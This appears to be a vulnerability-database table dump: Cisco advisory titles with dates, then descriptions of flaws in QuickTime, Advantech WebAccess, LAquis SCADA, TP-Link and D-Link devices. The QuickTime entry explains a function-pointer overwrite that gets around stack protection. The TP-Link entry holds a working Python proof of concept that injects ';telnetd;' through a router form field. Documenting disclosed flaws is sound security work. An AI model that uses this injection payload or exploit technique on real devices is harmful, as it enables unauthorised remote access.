| cisco-sa-asaftd-persist-rce-flsnxf4h | Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability | 2024-04-24T16:00:00+00:00 | 2024-04-24T16:00:00+00:00 |
| cisco-sa-asaftd-cmd-inj-zjv8wysm | Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability | 2024-04-24T16:00:00+00:00 | 2024-04-24T16:00:00+00:00 |
| cisco-sa-snmp-uwbxfqww | Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability | 2024-04-17T16:00:00+00:00 | 2024-04-17T16:00:00+00:00 |
| cisco-sa-ios-dos-hq4d3tzg | Cisco IOS Software for Catalyst 6000 Series Switches Denial of Service Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-04-04T15:31:55+00:00 |
| cisco-sa-tms-xss-kgw4dx9y | Cisco TelePresence Management Suite Cross-Site Scripting Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-sbiz-rv-xss-oqertup | Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers Cross-Site Scripting Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-ndru-pesc-kz2pqlzh | Cisco Nexus Dashboard Privilege Escalation Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-ndo-upav-yrqsccsp | Cisco Nexus Dashboard Orchestrator Unauthorized Policy Actions Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-ndidv-lmxdvaf2 | Cisco Nexus Dashboard Information Disclosure Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-ndfccsrf-temzefj9 | Cisco Nexus Dashboard and Nexus Dashboard Hosted Services Cross-Site Request Forgery Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-ndfc-dir-trav-ssn3aydw | Cisco Nexus Dashboard Fabric Controller Plug and Play Arbitrary File Read Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-ise-ssrf-ftsth5oz | Cisco Identity Services Engine Server-Side Request Forgery Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-ise-csrf-nfakxrp5 | Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-ece-xss-csqxgxfm | Cisco Enterprise Chat and Email Cross-Site Scripting Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-cucm-imps-xss-quwkd9yf | Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-cem-csrf-sucmnjfr | Cisco Emergency Responder Cross-Site Request Forgery and Directory Traversal Vulnerabilities | 2024-04-03T16:00:00+00:00 | 2024-04-03T16:00:00+00:00 |
| cisco-sa-iosxe-utd-cmd-jbl8kvht | Cisco IOS XE Software Unified Threat Defense Command Injection Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-04-02T20:11:04+00:00 |
| cisco-sa-wlc-mdns-dos-4hv6pbgf | Cisco IOS XE Software for Wireless LAN Controllers Multicast DNS Denial of Service Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-03-27T16:00:00+00:00 |
| cisco-sa-lisp-3gyxs3qp | Cisco IOS and IOS XE Software Locator ID Separation Protocol Denial of Service Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-03-27T16:00:00+00:00 |
| cisco-sa-isis-sgjyouhx | Cisco IOS and IOS XE Software Intermediate System-to-Intermediate System Denial of Service Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-03-27T16:00:00+00:00 |
| cisco-sa-iosxe-wlc-privesc-rjsmrmpk | Cisco IOS XE Software for Wireless LAN Controllers Privilege Escalation Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-03-27T16:00:00+00:00 |
| cisco-sa-iosxe-priv-esc-seax6nlx | Cisco IOS XE Software Privilege Escalation Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-03-27T16:00:00+00:00 |
| cisco-sa-iosxe-ospf-dos-dr9sfrxp | Cisco IOS XE Software OSPFv2 Denial of Service Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-03-27T16:00:00+00:00 |
| cisco-sa-ios-xe-sda-edge-dos-qzwuwxwg | Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability | 2024-03-27T16:00:00+00:00 | 2024-03-27T16:00:00+00:00 |
| ID | Description |
|---|---|
| var-200512-0300 | Heap-based buffer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via a GIF image file with a crafted Netscape Navigator Application Extension Block that modifies the heap in the Picture Modifier block. Apple's QuickTime is a player for files and streaming media in a variety of different formats. A flaw in QuickTime's handling of Targa (TGA) image format files could allow a remote attacker to execute arbitrary code on a vulnerable system. Apple From QuickTime Version that fixes multiple vulnerabilities in 7.0.4 Has been released.Arbitrary code may be executed by a remote third party, DoS You can be attacked. For more information, see the information provided by the vendor. QuickTime is prone to a remote heap-based overflow vulnerability. This issue presents itself when the application processes a specially crafted GIF image file. A successful attack can result in a remote compromise. Versions prior to QuickTime 7.0.4 are vulnerable. This flaw has proven to allow for reliable control of data on the heap chunk and can be exploited via a web site by using ActiveX controls. The heap can be overwritten in the Picture Modifier block. The block size calculate code such as: .text:66A339CC mov ax, [esi+0Ch] .text:66A339D0 xor ecx, ecx .text:66A339D2 mov [esp+34h+var_28], ecx .text:66A339D6 mov [esp+34h+var_24], ecx .text:66A339DA mov [esp+34h+var_20], ecx .text:66A339DE mov [esp+34h+var_1C], ecx .text:66A339E2 mov word ptr [esp+34h+var_10], cx .text:66A339E7 mov [esp+34h+arg_4], eax .text:66A339EB movsx eax, ax .text:66A339EE mov word ptr [esp+34h+var_10+2], cx .text:66A339F3 mov cx, [esi+8] .text:66A339F7 movsx edx, cx .text:66A339FA sub eax, edx .text:66A339FC movsx edx, word ptr [esi+6] .text:66A33A00 add eax, 3Eh .text:66A33A03 push edi .text:66A33A04 movsx edi, word ptr [esi+0Ah] .text:66A33A08 sar eax, 3 .text:66A33A0B lea ebx, [esi+6] .text:66A33A0E and eax, 0FFFFFFFCh .text:66A33A11 sub edi, edx .text:66A33A13 movsx edx, ax .text:66A33A16 mov [esi+4], ax .text:66A33A1A imul edi, edx The allocate code is : .text:66A33A68 push edi .text:66A33A69 call sub_668B5B30 But when it real process data to this memory, it use real decode data to write this memory but didn\xa1\xaft check this heap size. This is segment of the write code function(sub_66AE0A70): .text:66AE0B18 movsx edx, word ptr [edi+12h] ; default .text:66AE0B1C imul edx, [edi+0Ch] .text:66AE0B20 mov ecx, [edi+4] .text:66AE0B23 inc word ptr [edi+16h] .text:66AE0B27 mov eax, [esp+arg_0] .text:66AE0B2B add edx, ecx .text:66AE0B2D mov [eax], edx .text:66AE0B2F mov eax, [ebp+10h] .text:66AE0B32 test eax, eax .text:66AE0B34 jz short loc_66AE0B62 .text:66AE0B36 mov ax, [ebp+1Ch] .text:66AE0B3A mov edx, [ebp+0Ch] .text:66AE0B3D movzx cx, ah .text:66AE0B41 mov ch, al .text:66AE0B43 mov [edx], cx .text:66AE0B46 movsx eax, word ptr [edi+12h] .text:66AE0B4A imul eax, [ebp+14h] .text:66AE0B4E add eax, [ebp+10h] .text:66AE0B51 mov cx, [ebp+18h] .text:66AE0B55 mov [ebp+0Ch], eax .text:66AE0B58 mov [ebp+1Ah], cx .text:66AE0B5C mov word ptr [ebp+1Ch], 0 Vendor Status: Apple has released a patch for this vulnerability. An attacker can create a qtif file and send it to the user via email, web page, or qtif file with activex and can directy overflow a function pointer immediately used so it can bypass any stack overflow protection in systems such as xp sp2 and 2003 sp1. Technical Details: When Quicktime processes the data field of a qtif format file, it will copy it to the stack by a byte to a byte , but there is no proper checking, so it will cause a stack overflow in memory. And in this stack, there is a function pointer which will be used immediately when it pre byte copies, so we can use it to bypass any stack overflow protection, such in xp sp2 and 2003 sp1. The origin function point value is 0x44332211. We only need to overflow it to : 0x08332211, ensuring it didn't cause a crash before the 0x44 has been overflowed to 0x08. When it overflows to 0x08332211, we can execute code to 0x08332211, and can first use javascript to get this memory and set my code in it. call [esp+138h+arg_4] <- call a function point in the stack, but this point can be overflowed References QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Vendor Status: Apple has released a patch for this vulnerability. The patch is available via the Updates section of the affected applications. This vulnerability has been assigned the CVE identifier CVE-2005-2340. Credit: Discovery: Fang Xing Greetings: Thanks to all the guys at eEye, and especially Karl Lynn's help. Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-011A Apple QuickTime Vulnerabilities Original release date: January 11, 2006 Last revised: January 11, 2006 Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows XP * Microsoft Windows 2000 Overview Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service. I. Description Apple QuickTime 7.0.4 resolves a number of image and media file handling vulnerabilities. (CAN-2005-3713) II. Impact The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. Potential consequences include remote execution of arbitrary code or commands and denial of service. III. Solution Upgrade Upgrade to QuickTime 7.0.4. Appendix A. References * US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845> * US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193> * US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729> * US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753> * US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449> * CVE-2005-2340 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE----- |
| var-201601-0038 | Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2790 IOCTL in the DrawSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to BwBuildPath with the Path parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems |
| var-201801-0394 | TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the cmxddns.lua file. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices. These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled). Vulnerability Type: ================ Command Injection (Authenticated) Product: ================ We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306). And the following model should also be affected and the vendor has confirmed: TP-Link ER5110G, TP-Link ER5120G, TP-Link ER5510G, TP-Link ER5520G, TP-Link R4149G, TP-Link R4239G, TP-Link R4299G, TP-Link R473GP-AC, TP-Link R473G, TP-Link R473P-AC, TP-Link R473, TP-Link R478G+, TP-Link R478, TP-Link R478+, TP-Link R483G, TP-Link R483, TP-Link R488, TP-Link WAR1300L, TP-Link WAR1750L, TP-Link WAR2600L, TP-Link WAR302, TP-Link WAR450L, TP-Link WAR450, TP-Link WAR458L, TP-Link WAR458, TP-Link WAR900L, TP-Link WVR1300G, TP-Link WVR1300L, TP-Link WVR1750L, TP-Link WVR2600L, TP-Link WVR300, TP-Link WVR302, TP-Link WVR4300L, TP-Link WVR450L, TP-Link WVR450, TP-Link WVR458L, TP-Link WVR900G, TP-Link WVR900L CVE details: ================ The detail of each vulnerability are as follows: CVE-2017-15613: new-interface variable in the cmxddns.lua file CVE-2017-15614: new-outif variable in the pptp_client.lua file CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file CVE-2017-15616: new-interface variable in the phddns.lua file CVE-2017-15617: iface variable in the interface_wan.lua file CVE-2017-15618: new-enable variable in the pptp_client.lua file CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file CVE-2017-15620: new-zone variable in the ipmac_import.lua file CVE-2017-15621: olmode variable in the interface_wan.lua file CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file CVE-2017-15623: new-enable variable in the pptp_server.lua file CVE-2017-15624: new-authtype variable in the pptp_server.lua file CVE-2017-15625: new-olmode variable in the pptp_client.lua file CVE-2017-15626: new-bindif variable in the pptp_server.lua file CVE-2017-15627: new-pns variable in the pptp_client.lua file CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file CVE-2017-15631: new-workmode variable in the pptp_client.lua file CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file CVE-2017-15633: new-ipgroup variable in the session_limits.lua file CVE-2017-15634: name variable in the wportal.lua file CVE-2017-15635: max_conn variable in the session_limits.lua file CVE-2017-15636: new-time variable in the webfilter.lua file CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file Credits: ================ chunibalon, puzzor @VARAS of IIE Timeline: ================ 2017.08 to 2017.09: Issues found. 2017.09.26: Vendor contacted. 2017.10.13: Vendor confirmed. 2017.10.14: CVE id requested. 2017.10.19: CVE id assigned. 2018.1: Vendor confirmed that all effected products have been fixed. Vulnerability detail: ================ These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file. In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113: *********************************** function add_phddns(http_form) local form_data = json.decode(http_form.data) local jdata = form_data.params.new ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil) if not ret then return false, err.ERR_COM_TABLE_ITEM_UCI_ADD end if not uci_r:commit(CONFIG_NAME) then return false, err.ERR_COM_UCI_COMMIT end -- add the ref of interface ifs.update_if_reference(jdata.interface, 1) sys.fork_exec('/etc/init.d/phddns restart') userconfig.cfg_modify() return jdata end *********************************** This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently. Then the malformed value of "interface" argument causes the command injection vulnerability. PoC file: ================ *********************************** import requests import urllib import json # This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616. # To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin' PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406' BASEURL = 'http://192.168.123.1' LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login' MARK = '###' VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK) headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": BASEURL[7:], "Origin": BASEURL, "Referer": "%s/webpages/login.html" % (BASEURL), "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "X-Requested-With": "XMLHttpRequest" } login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}} login_data = {'data':json.dumps(login_data_value)} s = requests.Session() s.headers.update(headers) print (LOGINURL) print (login_data) res = s.post(LOGINURL, data=login_data) stok = eval(res.text)['result']['stok'] print '[*] stok is %s' % (stok) tmp_vul = VULURL.replace(MARK, stok) print '[*] vul_url is %s ' % (tmp_vul) delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}} delete_data = {'data': json.dumps(delete_data)} print '[+] delete existed rule' res = s.post(tmp_vul, data=delete_data) print '[*] response is: %s' % (res.text) # after executing this payload, the router will open its telnetd service. payload = ''';telnetd;''' vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}} vul_data = {'data': json.dumps(vul_data)} print '[+] sending payload' res = s.post(tmp_vul, data=vul_data) print '[*] response is: %s' % (res.text) *********************************** Reference: ================ https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt |
| var-201801-0152 | An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27ec IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3 |
| var-201801-0151 | A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwscrp utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable |
| var-201902-0647 | LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the MemoryWriteLong method. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the aq process. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteNumber method. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition |
| var-201906-1029 | In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products |
| var-202007-0395 | Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. Advantech iView Has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put in a state. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet servlet. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Advantech iView is a device management application provided by Advantech |
| var-202305-0214 | D-Link DIR-2640 HNAP LoginPassword Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-2640 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management interface, which listens on TCP port 80 by default. A specially crafted login request can cause authentication to succeed without providing proper credentials. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19549. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link |
| var-202305-0130 | D-Link DIR-2640 EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the EmailFrom parameter provided to the HNAP1 endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19550. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link |
| var-202308-4331 | D-Link DAP-2622 DDP Firmware Upgrade Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20077. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3186 | D-Link DAP-2622 DDP Configuration Backup Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20066. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3151 | D-Link DAP-2622 DDP User Verification Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20053. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3130 | D-Link DAP-2622 DDP Configuration Restore Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20069. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3129 | D-Link DAP-2622 DDP Set AG Profile Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20079. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3114 | D-Link DAP-2622 DDP Reset Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20057. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company |
| var-202308-3113 | D-Link DAP-2622 DDP Configuration Backup Server Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20067. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3105 | D-Link DAP-2622 DDP Reset Factory Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20058. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company |
| var-202308-3456 | D-Link DAP-2622 DDP Reboot Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20055. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3426 | D-Link DAP-2622 DDP Configuration Backup Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20065. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company |
| var-202308-3391 | D-Link DAP-2622 DDP User Verification Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20052. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company |
